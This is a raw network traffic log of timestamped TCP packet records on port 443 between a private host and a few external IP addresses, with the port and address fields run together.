                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.158046961 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.158104897 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.158118963 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.165455103 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.165540934 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.165556908 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.173832893 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.173894882 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.173909903 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.182225943 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.182284117 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.182473898 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.182491064 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.182737112 CET49890443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.182802916 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.182877064 CET49890443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.183214903 CET49890443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.183249950 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.190958977 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.250863075 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.290491104 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.323133945 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.327302933 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.327368021 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.327395916 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.335839987 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.335912943 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.335928917 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.344125986 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.344175100 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.344188929 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.352657080 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.352716923 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.352745056 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.361098051 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.361159086 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.361171007 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.377486944 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.377557039 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.377569914 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.386329889 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.386385918 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.386399031 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.394280910 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.394354105 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.394366980 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.404028893 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.404093981 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.404105902 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.445312023 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.445327044 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.492611885 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.516057968 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.517765045 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.517823935 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.517838001 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.522830963 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.522942066 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.522953987 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.532670021 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.532740116 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.532752991 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.536761999 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.536823988 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.536835909 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.547614098 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.547640085 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.547683001 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.547700882 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.547728062 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.557156086 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.557226896 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.557239056 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.557384968 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.557395935 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.566708088 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.566773891 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.566787004 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.566868067 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.577869892 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.577888966 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.577945948 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.581342936 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.581403971 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.581415892 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.581470966 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.591062069 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.591126919 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.600567102 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.600630045 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.707415104 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.707490921 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.712235928 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.712316990 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.716063023 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.716141939 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.723654032 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.723723888 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.727380991 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.727444887 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.735234022 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.735305071 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.741342068 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.741410017 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.748682976 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.748754025 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.752043009 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.752106905 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.758738995 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.758805037 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.762602091 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.762670994 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.768866062 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.768929005 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.772797108 CET44349880141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.773058891 CET49880443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.773078918 CET44349880141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.774209023 CET44349880141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.774518967 CET49880443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.774697065 CET44349880141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.774703979 CET49880443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.775398016 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.775577068 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.775620937 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.775749922 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.775849104 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.776098013 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.776374102 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.776463985 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.776483059 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.779164076 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.779222965 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.779273033 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.779304981 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.779366970 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.779772043 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.779822111 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.779906034 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.780390978 CET49891443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.780419111 CET44349891141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.815357924 CET44349880141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.817323923 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.817325115 CET49880443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.817359924 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.001255035 CET44349882141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.001552105 CET49882443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.001574993 CET44349882141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.002027035 CET44349882141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.002372026 CET49882443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.002454996 CET44349882141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.002507925 CET49882443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.019242048 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.019478083 CET49883443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.019520044 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.020613909 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.020925045 CET49883443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.021018982 CET49883443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.021029949 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.021100998 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.032769918 CET44349884141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.032972097 CET49884443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.033010960 CET44349884141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.034117937 CET44349884141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.034385920 CET49884443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.034491062 CET49884443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.034502029 CET44349884141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.034594059 CET44349884141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.038608074 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.039057970 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.039093018 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.042608023 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.042675018 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.043040037 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.043160915 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.043173075 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.043242931 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.043330908 CET44349882141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.044038057 CET49882443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.076081038 CET49883443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.076087952 CET49884443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.092263937 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.092324018 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.139215946 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.204313040 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.204544067 CET49886443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.204570055 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.206011057 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.206073046 CET49886443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.206783056 CET49886443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.206887960 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.207140923 CET49886443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.207156897 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222146034 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222254992 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222328901 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222333908 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222378969 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222448111 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222480059 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222505093 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222560883 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222582102 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222767115 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.222862959 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.223434925 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.223464966 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.230397940 CET44349880141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.230639935 CET44349880141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.230715990 CET49880443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.233639002 CET49880443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.233681917 CET44349880141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.234246016 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.234285116 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.234388113 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.236356020 CET49892443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.236382008 CET44349892141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.247208118 CET49893443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.247262955 CET44349893141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.247452974 CET49893443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.247673035 CET49893443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.247728109 CET44349893141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.255045891 CET49886443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.280829906 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.281064987 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.281128883 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.284687042 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.284878016 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.285039902 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.285155058 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.285180092 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.285223007 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.335134983 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.335151911 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.356359005 CET44349888141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.356769085 CET49888443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.356807947 CET44349888141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.357882023 CET44349888141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.358510017 CET49888443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.358619928 CET49888443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.358633995 CET44349888141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.358730078 CET44349888141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.363751888 CET44349889141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.363970041 CET49889443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.364032984 CET44349889141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.367438078 CET44349889141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.367511034 CET49889443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.382047892 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.399734974 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.402067900 CET49888443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.435305119 CET49890443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.435381889 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.435769081 CET49889443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.436014891 CET44349889141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.436382055 CET49889443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.436429977 CET44349889141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.436847925 CET44349890141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.436937094 CET49890443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.437117100 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.437160015 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.437406063 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.437743902 CET49894443192.168.2.4199.232.168.157
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.437761068 CET44349894199.232.168.157192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:02.438111067 CET49890443192.168.2.4141.193.213.11
